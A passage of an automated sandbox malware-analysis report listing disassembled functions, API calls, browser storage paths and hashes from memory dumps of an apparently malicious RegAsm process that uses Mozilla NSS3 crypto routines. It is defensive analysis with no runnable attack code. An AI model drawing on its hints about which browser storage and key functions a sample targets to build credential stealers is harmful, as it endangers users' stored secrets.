                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: free$DestroyFreeK11_Monitor
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3989322779-0
                                                                                                                                                                                                                                                                  • Opcode ID: c4cad14657aafc5d7afdab64710582e43a4b8e1a043d51b03e29b79ec74d345d
                                                                                                                                                                                                                                                                  • Instruction ID: d124255ec461c6c0ec77bd2650810c1eed4b2c0e53f49eddb430b57c63b56ffc
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c4cad14657aafc5d7afdab64710582e43a4b8e1a043d51b03e29b79ec74d345d
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D7015EB1701B06ABEB50DF2AD908767B7E8BF10669B104839D85AD3E00EB35F055CB91
                                                                                                                                                                                                                                                                  Function 0040FAE3 Relevance: 6.0, APIs: 4, Instructions: 45stringCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 0040FAE8
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(?,?,?,?,?,0041738F,?,?,00426B18,?,00000000,004265B7), ref: 0040FB10
                                                                                                                                                                                                                                                                  • lstrcpy.KERNEL32(00000000), ref: 0040FB37
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 0040FB42
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: H_prologlstrcatlstrcpylstrlen
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 809291720-0
                                                                                                                                                                                                                                                                  • Opcode ID: 238e1b5b11c75e3c7102c1fac72ebfe3dc1e1f24cffbe9a4b01f8ccca803e85b
                                                                                                                                                                                                                                                                  • Instruction ID: 0e42d02640ecd7300938d4a229cd94be4f65cdd59a030de616ad0f121b86e810
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 238e1b5b11c75e3c7102c1fac72ebfe3dc1e1f24cffbe9a4b01f8ccca803e85b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0F015AB6900205EFCB209F99D88499AFBF5FF49350B10883EE6A9E3610C774A880CF50
                                                                                                                                                                                                                                                                  Function 6C9BAC00 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • PK11_FreeSymKey.NSS3(?,6C9A5D40,00000000,?,?,6C996AC6,6C9A639C), ref: 6C9BAC2D
                                                                                                                                                                                                                                                                    • Part of subcall function 6C95ADC0: TlsGetValue.KERNEL32(?,6C93CDBB,?,6C93D079,00000000,00000001), ref: 6C95AE10
                                                                                                                                                                                                                                                                    • Part of subcall function 6C95ADC0: EnterCriticalSection.KERNEL32(?,?,6C93CDBB,?,6C93D079,00000000,00000001), ref: 6C95AE24
                                                                                                                                                                                                                                                                    • Part of subcall function 6C95ADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C93D079,00000000,00000001), ref: 6C95AE5A
                                                                                                                                                                                                                                                                    • Part of subcall function 6C95ADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C93CDBB,?,6C93D079,00000000,00000001), ref: 6C95AE6F
                                                                                                                                                                                                                                                                    • Part of subcall function 6C95ADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C93CDBB,?,6C93D079,00000000,00000001), ref: 6C95AE7F
                                                                                                                                                                                                                                                                    • Part of subcall function 6C95ADC0: TlsGetValue.KERNEL32(?,6C93CDBB,?,6C93D079,00000000,00000001), ref: 6C95AEB1
                                                                                                                                                                                                                                                                    • Part of subcall function 6C95ADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C93CDBB,?,6C93D079,00000000,00000001), ref: 6C95AEC9
                                                                                                                                                                                                                                                                  • PK11_FreeSymKey.NSS3(?,6C9A5D40,00000000,?,?,6C996AC6,6C9A639C), ref: 6C9BAC44
                                                                                                                                                                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(8CB6FF15,00000000,6C9A5D40,00000000,?,?,6C996AC6,6C9A639C), ref: 6C9BAC59
                                                                                                                                                                                                                                                                  • free.MOZGLUE(8CB6FF01,6C996AC6,6C9A639C,?,?,?,?,?,?,?,?,?,6C9A5D40,00000000,?,6C9AAAD4), ref: 6C9BAC62
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1595327144-0
                                                                                                                                                                                                                                                                  • Opcode ID: ed245467a681458e2c1271d463b380a412d6a26f6d68c54e3e4b074071a4b926
                                                                                                                                                                                                                                                                  • Instruction ID: dae07adf9ae3e86d560eb49eb4ea2f25195cef39595c0219317bfa548ba2a7b0
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ed245467a681458e2c1271d463b380a412d6a26f6d68c54e3e4b074071a4b926
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 840178B5600200AFDB00DF19E8C0B5677ACAB24B1CF188068E8099F706EB34F808CBA1
                                                                                                                                                                                                                                                                  Function 6C96FD80 Relevance: 6.0, APIs: 4, Instructions: 43memoryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6C919003,?), ref: 6C96FD91
                                                                                                                                                                                                                                                                    • Part of subcall function 6C970BE0: malloc.MOZGLUE(6C968D2D,?,00000000,?), ref: 6C970BF8
                                                                                                                                                                                                                                                                    • Part of subcall function 6C970BE0: TlsGetValue.KERNEL32(6C968D2D,?,00000000,?), ref: 6C970C15
                                                                                                                                                                                                                                                                  • PORT_Alloc_Util.NSS3(A4686C97,?), ref: 6C96FDA2
                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(00000000,12D068C3,A4686C97,?,?), ref: 6C96FDC4
                                                                                                                                                                                                                                                                  • free.MOZGLUE(00000000,?,?), ref: 6C96FDD1
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Alloc_Util$Valuefreemallocmemcpy
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2335489644-0
                                                                                                                                                                                                                                                                  • Opcode ID: 0b9df5052a7b283391020c1b97ae850c24400ab22e8759735e412e458bc7b1e6
                                                                                                                                                                                                                                                                  • Instruction ID: a5cee11b486b556f5aec57fad3ddab5d9aa6bfc98ce39f416bc843e796e1aae5
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0b9df5052a7b283391020c1b97ae850c24400ab22e8759735e412e458bc7b1e6
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8FF0C8B16012025BFF004B56DC90A277B5CEF5469DB148034ED098AF41E721E815C7E1
                                                                                                                                                                                                                                                                  Function 6CA2CC50 Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CriticalDeleteSectionfree
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2988086103-0
                                                                                                                                                                                                                                                                  • Opcode ID: 0cadb8d137edc138627b23894278a13bbcfa7e55355c54ef4e71ea9baa096ee1
                                                                                                                                                                                                                                                                  • Instruction ID: 04fdf01d2802e5dde9ad98a29d64a9454083caade1026387f44ae77baf58050c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0cadb8d137edc138627b23894278a13bbcfa7e55355c54ef4e71ea9baa096ee1
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FDE030767017099BCE10EFA9DC4489677ACEE492743154525E691C3700D235F905CBA1
                                                                                                                                                                                                                                                                  Function 0040B002 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 161COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 0040B007
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: _EH_prolog.MSVCRT ref: 0040FA74
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcpy.KERNEL32(00000000), ref: 0040FAC0
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcat.KERNEL32(?,?), ref: 0040FACA
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: _EH_prolog.MSVCRT ref: 0040FAE8
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrlenA.KERNEL32(?,?,?,?,?,0041738F,?,?,00426B18,?,00000000,004265B7), ref: 0040FB10
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcpy.KERNEL32(00000000), ref: 0040FB37
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcat.KERNEL32(?,?), ref: 0040FB42
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000,?), ref: 0040FA61
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9A1: lstrcpy.KERNEL32(00000000,plA), ref: 0040F9C7
                                                                                                                                                                                                                                                                    • Part of subcall function 00410CC3: _EH_prolog.MSVCRT ref: 00410CC8
                                                                                                                                                                                                                                                                    • Part of subcall function 00410CC3: GetFileAttributesA.KERNEL32(00000000,?,0040BB15,?,00425C4E,?,?), ref: 00410CDC
                                                                                                                                                                                                                                                                    • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A9D4: _EH_prolog.MSVCRT ref: 0040A9D9
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A9D4: wsprintfA.USER32 ref: 0040AA02
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A9D4: FindFirstFileA.KERNEL32(?,?), ref: 0040AA19
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A9D4: StrCmpCA.SHLWAPI(?,00425EE4), ref: 0040AA36
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A9D4: StrCmpCA.SHLWAPI(?,00425EE8), ref: 0040AA50
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A9D4: lstrlenA.KERNEL32(00000000,00425C2A,00000000,?,?,?,00425EEC,?,?,00425C27), ref: 0040AB00
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: H_prolog$lstrcpy$Filelstrcatlstrlen$AttributesFindFirstwsprintf
                                                                                                                                                                                                                                                                  • String ID: .metadata-v2$\storage\default\
                                                                                                                                                                                                                                                                  • API String ID: 2418158533-762053450
                                                                                                                                                                                                                                                                  • Opcode ID: c5cbab755dfd2393dc1f9eb116b78d8ed8e9bdcf37c3baab6109b2e6f668b157
                                                                                                                                                                                                                                                                  • Instruction ID: 6ad4b1001a1d44137b8a14de487e46624c572c3edceab36f9a05cf6ae6b64a52
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c5cbab755dfd2393dc1f9eb116b78d8ed8e9bdcf37c3baab6109b2e6f668b157
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8B614A70905288EACB14EBE5D556BDDBBB46F15308F5440BEE805736C2DB781B0CCBA6
                                                                                                                                                                                                                                                                  Function 0040E08F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 0040E0A9
                                                                                                                                                                                                                                                                    • Part of subcall function 0041E6C0: std::exception::exception.LIBCMT ref: 0041E6D5
                                                                                                                                                                                                                                                                    • Part of subcall function 0041E6C0: __CxxThrowException@8.LIBCMT ref: 0041E6EA
                                                                                                                                                                                                                                                                    • Part of subcall function 0041E6C0: std::exception::exception.LIBCMT ref: 0041E6FB
                                                                                                                                                                                                                                                                    • Part of subcall function 0040DE98: std::_Xinvalid_argument.LIBCPMT ref: 0040DEA9
                                                                                                                                                                                                                                                                  • memcpy.MSVCRT ref: 0040E104
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • invalid string position, xrefs: 0040E0A4
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throwmemcpy
                                                                                                                                                                                                                                                                  • String ID: invalid string position
                                                                                                                                                                                                                                                                  • API String ID: 214693668-1799206989
                                                                                                                                                                                                                                                                  • Opcode ID: b3cea4396cd69cadc8cdc5d381741c8a2e82abec305105c40dc7691f631d177e
                                                                                                                                                                                                                                                                  • Instruction ID: 34cf4bff4d7cf1456674a8e46a855383a3c4a8fb9112a8d8faf89ec74adcb037
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b3cea4396cd69cadc8cdc5d381741c8a2e82abec305105c40dc7691f631d177e
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EE110B31304260DBDB249E0ECC41A1AB3A5EF85710B100D3FF812AB2C2C7F5D861839D
                                                                                                                                                                                                                                                                  Function 0040DFF6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Xinvalid_argumentmemcpystd::_
                                                                                                                                                                                                                                                                  • String ID: string too long
                                                                                                                                                                                                                                                                  • API String ID: 1835169507-2556327735
                                                                                                                                                                                                                                                                  • Opcode ID: f3fc669487e3446fed126dacf7f42d121025fcc5a57803b965e043759ae16248
                                                                                                                                                                                                                                                                  • Instruction ID: 2b2c0e6bac36d119e4e60cc9da1b1e7dd44a3212a419035da328183ae0c210ee
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f3fc669487e3446fed126dacf7f42d121025fcc5a57803b965e043759ae16248
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C911E9313002209BDB309E6ED940A26B7E5EF41714B100D3FF9866B2C2C7FA985587D9
                                                                                                                                                                                                                                                                  Function 0040DCDF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 0040DCF5
                                                                                                                                                                                                                                                                    • Part of subcall function 0041E6C0: std::exception::exception.LIBCMT ref: 0041E6D5
                                                                                                                                                                                                                                                                    • Part of subcall function 0041E6C0: __CxxThrowException@8.LIBCMT ref: 0041E6EA
                                                                                                                                                                                                                                                                    • Part of subcall function 0041E6C0: std::exception::exception.LIBCMT ref: 0041E6FB
                                                                                                                                                                                                                                                                  • memmove.MSVCRT ref: 0040DD2E
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • invalid string position, xrefs: 0040DCF0
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentmemmovestd::_
                                                                                                                                                                                                                                                                  • String ID: invalid string position
                                                                                                                                                                                                                                                                  • API String ID: 1659287814-1799206989
                                                                                                                                                                                                                                                                  • Opcode ID: 488acd1d338eb6ef0a1bb28b73d2c693d379c2b736753fd076ee43f8c7aaa6ff
                                                                                                                                                                                                                                                                  • Instruction ID: 7454e49918df775ec149311480c4d0c81d7a6f0b4424e3302c96ad14dc9cd2ab
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 488acd1d338eb6ef0a1bb28b73d2c693d379c2b736753fd076ee43f8c7aaa6ff
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9501D8317002109BD3248EE9D9C096BB7A6EFD6710770493FD442DB385DBB8EC4A87A8
                                                                                                                                                                                                                                                                  Function 6C970DB0 Relevance: 5.1, APIs: 4, Instructions: 97COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
